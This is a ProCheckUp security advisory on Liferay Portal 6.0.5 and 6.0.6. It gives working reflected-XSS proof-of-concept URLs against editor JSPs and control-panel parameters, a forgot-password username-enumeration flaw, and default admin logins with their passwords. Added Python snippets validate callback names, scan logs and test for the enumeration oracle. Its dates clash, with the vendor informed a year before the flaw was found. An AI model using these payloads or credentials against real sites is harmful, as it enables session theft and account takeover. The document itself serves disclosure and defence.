PR11-08 - Liferay Portal multiple unauthenticated & authenticated XSS and username enumeration

Vulnerability found: 05 September 2011
Vendor informed: 12 September 2010
Severity level: Medium (Script injection)
Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Description:
Multiple Cross-site Scripting vulnerabilities exist within the Liferay Portal software.

ProCheckUp has found that, by making malformed requests to the Liferay Portal both with and without being authenticated, multiple vanilla cross-site scripting (XSS) vulnerabilities can be triggered. In addition, Liferay has a vulnerability which allows valid user names to be enumerated, and therefore allows the default admin accounts to be identified.

Successfully tested on:
Versions: 6.0.5, with some of the issues also confirmed on version 6.0.6
Proof of concept:
1) Unauthenticated XSS attacks
The following attacks have been tested with IE and Firefox:-

http://target-domain.foo/netvibes/web/guest/home/-/</title><script>alert(1)</script>

http://target-domain.foo/html/js/editor/editor.jsp?&initMethod=_33_initEditord%3balert(1)//

http://target-domain.foo/html/js/editor/fckeditor.jsp?initMethod=test%3b%0A%0D}%0A%0D}%0A%0Dalert%281%29;%0A%0Dfunction%20blah%28%29{{//
http://target-domain.foo/html/js/editor/tinymce.jsp?onChangeMethod=test%3b%0A%0D}%0A%0D}%0A%0Dalert%281%29;%0A%0Dfunction%20blah%28%29{{//

Version 6.0.5 attack variant
http://target-domain.foo/html/js/editor/ckeditor.jsp?initMethod=test%3b}%0a%0dalert(1);%0a%0dfunction blah(){//

Version 6.0.6 attack variant
http://target-domain.foo/html/js/editor/ckeditor.jsp?initMethod=test)%3b}%0a%0dalert(1);%0a%0dfunction blah(){//

http://target-domain.foo/html/js/editor/liferay.jsp?onChangeMethod=test%3b%0A%0D%7d%0A%0D%7d%0A%0D%7d%0A%0Dalert%281%29;%0A%0Dfunction%20blah%28%29%7b%0A%0Dif%20%28emotionWindow%20!=%20null%29%20%7b%0A%0Dtry%20%7bparent.test;//&disableControl=2&request=1

http://target-domain.foo/web/guest/availability-check?p_p_id=58&redirect=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

2) Authenticated XSS attacks
The following attacks work with IE only:-

http://target-domain.foo/ar/web/guest/home?p_p_id=86&p_p_state=maximized&_86_=&_86_portletResource=<script>alert(1)</script>&_86_struts_action=%2Fportlet_configuration%2Fexport_import

http://target-domain.foo/ar/group/22/1?p_p_id=86&p_p_state=maximized&_86_struts_action=%2Fportlet_configuration%2Fexport_import&_86_portletResource=<script>alert("XSS")</script>

http://target-domain.foo/ar/group/control_panel "><ScRiPt>alert(1)</ScRiPt>=1

http://target-domain.foo/ar/group/control_panel/manage?refererPlid=\"><ScRiPt>alert(1)</ScRiPt>

http://target-domain.foo/group/control_panel?"><ScRiPt>alert(1)</ScRiPt>=1

An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious web page. The malicious code would run in the security context of the vulnerable website.

This type of attack can result in non-persistent defacement of the target site, or in the redirection of confidential information (e.g. passwords or session IDs) to unauthorised third parties.
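The editor pages listed above (editor.jsp, fckeditor.jsp, tinymce.jsp, ckeditor.jsp, liferay.jsp) take the name of a JavaScript callback in the initMethod or onChangeMethod parameter and place it in inline script, which is why a value containing a semicolon, braces and line breaks escapes the intended call. The following Python is an added example and not Liferay's code: it allow-lists such parameters to bare identifiers, refuses to render anything else, and runs the same check over constructed access-log lines. The template string, function names and log lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A legitimate callback name is a bare (dotted) JavaScript identifier such as
# "_33_initEditor"; anything else is rejected outright rather than escaped,
# because no encoding makes arbitrary text safe as a function name in script.
CALLBACK_PARAMS = ("initMethod", "onChangeMethod")
JS_IDENTIFIER = re.compile(r"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*")


def is_safe_callback_name(value: str) -> bool:
    """True only if value is a plain JavaScript identifier path."""
    return JS_IDENTIFIER.fullmatch(value) is not None


def render_callback_script(callback: str) -> str:
    """Hypothetical server-side template: emits the callback invocation or refuses."""
    if not is_safe_callback_name(callback):
        raise ValueError("callback parameter must be a JavaScript identifier")
    return "<script>function initEditor(){ %s(); }</script>" % callback


def suspicious_callback_requests(log_lines):
    """Flag access-log lines whose editor-callback parameters are not bare identifiers."""
    hits = []
    for line in log_lines:
        try:
            url = line.split('"')[1].split()[1]  # request target of a combined-format line
        except IndexError:
            continue
        query = parse_qs(urlsplit(url).query, keep_blank_values=True)
        for name in CALLBACK_PARAMS:
            for value in query.get(name, []):
                if not is_safe_callback_name(value):
                    hits.append((name, value))
    return hits


# Constructed access-log lines: one legitimate request, then the advisory's
# editor.jsp and ckeditor.jsp (6.0.5) request patterns.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2011:10:01:02 +0100] "GET /html/js/editor/editor.jsp?initMethod=_33_initEditor HTTP/1.1" 200 812',
    '10.0.0.7 - - [05/Sep/2011:10:01:09 +0100] "GET /html/js/editor/editor.jsp?&initMethod=_33_initEditord%3balert(1)// HTTP/1.1" 200 812',
    '10.0.0.7 - - [05/Sep/2011:10:01:15 +0100] "GET /html/js/editor/ckeditor.jsp?initMethod=test%3b}%0a%0dalert(1);%0a%0dfunction%20blah(){// HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for name, value in suspicious_callback_requests(SAMPLE_LOG):
        print("suspicious %s=%r" % (name, value))
```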

3) The Liferay forgot password page can also be used for username enumeration, as a different error message is returned when a valid user name (with a wrong password) is entered than when an invalid user name is entered.

This is important because the Liferay default admin accounts can be enumerated:
Email address: bruno@7cogs.com
Password: bruno

Email address: test@liferay.com
Password: test
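The enumeration above works because the response differs depending on whether the address is registered. The following Python is an added example, not Liferay code: a handler with the behaviour the advisory describes beside a hardened one that answers identically either way, plus the check a tester runs after the fix to confirm the oracle is gone. The user store, messages and function names are constructed assumptions; the two default accounts listed above are included so the check can be exercised against them.

```python
from dataclasses import dataclass

# Constructed user store standing in for Liferay's account table.
USERS = {"bruno@7cogs.com": "bruno", "test@liferay.com": "test"}
OUTBOX = []  # reset mails that would be sent; a side effect, never part of the response


@dataclass(frozen=True)
class Response:
    status: int
    body: str


def forgot_password_vulnerable(email: str) -> Response:
    """Behaviour the advisory describes: the message reveals whether the account exists."""
    if email not in USERS:
        return Response(200, "No user exists with the email address " + email)
    return Response(200, "A password reminder has been sent to " + email)


def forgot_password_fixed(email: str) -> Response:
    """Hardened version: same status and body whether or not the address is registered."""
    if email in USERS:
        OUTBOX.append(email)
    return Response(200, "If that address is registered, a password reminder has been sent.")


def leaks_user_existence(handler, known_valid: str, known_invalid: str) -> bool:
    """Verification check: any difference in status or body between a known-valid
    and a known-invalid address is an enumeration oracle."""
    valid, invalid = handler(known_valid), handler(known_invalid)
    return (valid.status, valid.body) != (invalid.status, invalid.body)


if __name__ == "__main__":
    for name, handler in (("vulnerable", forgot_password_vulnerable), ("fixed", forgot_password_fixed)):
        print(name, "leaks:", leaks_user_existence(handler, "bruno@7cogs.com", "nobody@example.invalid"))
```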
How to fix:
Update to Liferay Portal version 6.1.1 or a later version.
Legal:
Copyright 2011-2013 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
